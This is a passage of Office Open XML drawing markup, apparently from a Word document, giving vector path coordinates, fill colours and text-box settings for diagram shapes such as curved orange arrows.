                                <a:lnTo>
                                  <a:pt x="1983994" y="3489325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1983994" y="3502025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5841619" y="3502025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5841619" y="3533775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5905119" y="3502025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5917819" y="3495675"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="511" name="Graphic 511"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2251963" y="2783589"/>
                            <a:ext cx="1866264" cy="1816735"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1866264" h="1816735">
                                <a:moveTo>
                                  <a:pt x="1412367" y="81280"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1405991" y="61214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1386586" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337056" y="69342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1365288" y="73825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1361059" y="100711"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1352296" y="151638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1343164" y="200291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1331404" y="255638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1320152" y="303022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1320025" y="303415"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319885" y="304025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1305966" y="354609"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1290510" y="403974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1273098" y="452005"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1273111" y="452158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1253083" y="500888"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1230071" y="549363"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1204226" y="597192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1204150" y="597458"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1190117" y="621030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1175626" y="643928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1159154" y="668197"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1159027" y="668439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1123670" y="716026"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1085799" y="761187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1065161" y="783602"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1065085" y="783793"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1045908" y="803503"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1043101" y="806259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1042974" y="806386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1020318" y="828675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996086" y="851039"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="995972" y="851217"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="945464" y="894981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="914222" y="920229"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="861314" y="960755"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="797153" y="1006817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="738124" y="1046480"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="705612" y="1067689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638429" y="1109853"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="603885" y="1130681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535787" y="1170851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468287" y="1209319"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="386588" y="1254506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234188" y="1336167"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1457579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8636" y="1474597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="243078" y="1352931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395732" y="1271270"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="470027" y="1230122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="542925" y="1188720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613664" y="1147064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="648335" y="1126109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="682371" y="1105027"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715899" y="1083818"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="748538" y="1062482"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="780669" y="1041019"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="812165" y="1019556"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="872617" y="976122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="929767" y="932180"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="983488" y="887730"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1033272" y="842645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1078992" y="796683"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1120394" y="750189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1157605" y="702945"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1191006" y="655193"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1220724" y="606806"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1247013" y="558038"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1270381" y="508635"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1290828" y="458851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1308989" y="408813"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1324610" y="358521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1338580" y="307975"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1350645" y="257048"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1361440" y="206121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1370965" y="155067"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1379728" y="103886"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1384058" y="76796"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1412367" y="81280"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1866264" h="1816735">
                                <a:moveTo>
                                  <a:pt x="1866125" y="489204"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1865884" y="457454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1864766" y="426161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1864741" y="425323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1862874" y="393954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1862836" y="393192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1860257" y="362077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1860169" y="360934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1857108" y="329946"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1856994" y="328676"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1844040" y="231521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1833499" y="166497"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1821815" y="101346"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1809750" y="36195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1797304" y="38481"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1809369" y="103632"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1820926" y="168529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1831467" y="233426"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1840484" y="297942"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1844294" y="329946"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1847469" y="360934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1847596" y="362077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1850072" y="393192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1850136" y="393954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852002" y="425323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852041" y="426161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1853171" y="457200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1853425" y="489204"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852930" y="520319"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1851431" y="551230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1848764" y="582701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1848827" y="582942"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1845183" y="613537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1840560" y="643077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1834438" y="674801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1834438" y="675030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1818741" y="735076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1798193" y="792873"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1784578" y="824103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1784464" y="824382"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1754238" y="881951"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1717167" y="938618"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1695043" y="967892"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1694700" y="968349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1671434" y="995997"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1646542" y="1023239"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1619262" y="1050442"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1619161" y="1050607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1561134" y="1102499"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1525778" y="1130808"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1491665" y="1156614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1454404" y="1183132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1416050" y="1209040"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1376299" y="1234567"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1334897" y="1259840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1291971" y="1284986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252969" y="1307071"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252804" y="1307160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1198486" y="1336573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149959" y="1361884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1107186" y="1383665"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1057910" y="1407795"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1007618" y="1431798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="956310" y="1455674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="903986" y="1479423"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="850646" y="1503045"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="741807" y="1549908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="630047" y="1596390"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="451192" y="1668335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="177520" y="1774825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="166116" y="1745234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="108712" y="1808226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193548" y="1816354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="183896" y="1791335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="182105" y="1786724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="463042" y="1677289"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="634873" y="1608201"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="746760" y="1561719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="855726" y="1514729"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="961517" y="1467231"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1012952" y="1443355"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1063371" y="1419225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1112774" y="1394968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1161034" y="1370457"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1208151" y="1345819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1253871" y="1321054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1273543" y="1309979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1298321" y="1296035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1341374" y="1270762"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1383030" y="1245362"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1423035" y="1219708"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1461516" y="1193673"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1498473" y="1167384"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1533525" y="1140841"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1566926" y="1114171"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1578267" y="1104430"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1598422" y="1087120"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1628013" y="1059688"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1655826" y="1032002"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1705102" y="975614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1746758" y="917956"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1781302" y="859282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1809242" y="799592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1830832" y="739013"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1846834" y="677545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1857756" y="615315"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1863979" y="552450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1865503" y="520827"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1866125" y="489204"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="512" name="Graphic 512"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5341619" y="2012192"/>
                            <a:ext cx="2053589" cy="2028189"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="71198" y="42617"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="277113" y="104139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551179" y="188849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="684783" y="232156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="815339" y="276225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="942085" y="321183"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064513" y="367411"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1181988" y="415036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1238757" y="439293"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1294002" y="463931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1347724" y="489076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1399939" y="514682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450212" y="540512"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1500904" y="568306"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1545731" y="594070"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1589626" y="620973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1632177" y="648838"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1673859" y="677926"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1711340" y="706189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1747556" y="735743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1782890" y="767014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1814257" y="797879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1814496" y="798011"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1843404" y="829310"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1870202" y="861568"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1894712" y="894207"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1916251" y="926453"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1936396" y="960119"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1955801" y="997042"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1971728" y="1031761"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1997756" y="1101901"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2016987" y="1173479"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2017606" y="1176195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2017688" y="1176391"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2024574" y="1211607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030818" y="1251464"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030856" y="1251708"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030958" y="1252360"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2038153" y="1327785"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039852" y="1367154"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2040379" y="1407033"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039749" y="1446529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2038002" y="1486022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2035302" y="1526921"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2031619" y="1567434"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2027174" y="1608328"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2021839" y="1649349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2015998" y="1690624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2009266" y="1732026"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2002281" y="1773555"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1987093" y="1855474"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1969897" y="1941068"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1952625" y="2025142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1965071" y="2027682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1982342" y="1943608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1999233" y="1859534"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2014727" y="1775714"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2021839" y="1734058"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2028571" y="1692529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2034412" y="1651127"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2039747" y="1609852"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2044319" y="1568831"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2047875" y="1527937"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2050669" y="1487424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2052447" y="1447038"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2053081" y="1407033"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2052581" y="1367774"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2052574" y="1367154"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2050972" y="1328967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2047964" y="1289812"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2043429" y="1249807"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2037485" y="1211607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2030095" y="1173479"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2020951" y="1136014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2010155" y="1098803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1997582" y="1062227"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1983104" y="1026160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1966722" y="990473"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1948306" y="955421"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1927859" y="921003"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1905127" y="886968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1880234" y="853694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1853056" y="821054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1823465" y="789051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1791461" y="757682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1757045" y="727075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1720341" y="697102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1681352" y="667765"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1640331" y="638937"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1597152" y="610743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1552066" y="583184"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="556006"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1456181" y="529336"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1405635" y="503300"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1353311" y="477647"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1299336" y="452500"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1243964" y="427609"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1186941" y="403351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1069212" y="355600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="946530" y="309245"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="819530" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="688848" y="220090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="554989" y="176784"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280797" y="91948"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="1782890" y="767014"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1782752" y="767014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1784234" y="768331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1782890" y="767014"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="83947" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="14732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="62102" y="73025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="71198" y="42617"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="59054" y="38988"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75931" y="26797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="83947" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="62610" y="26797"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="59054" y="38988"/>
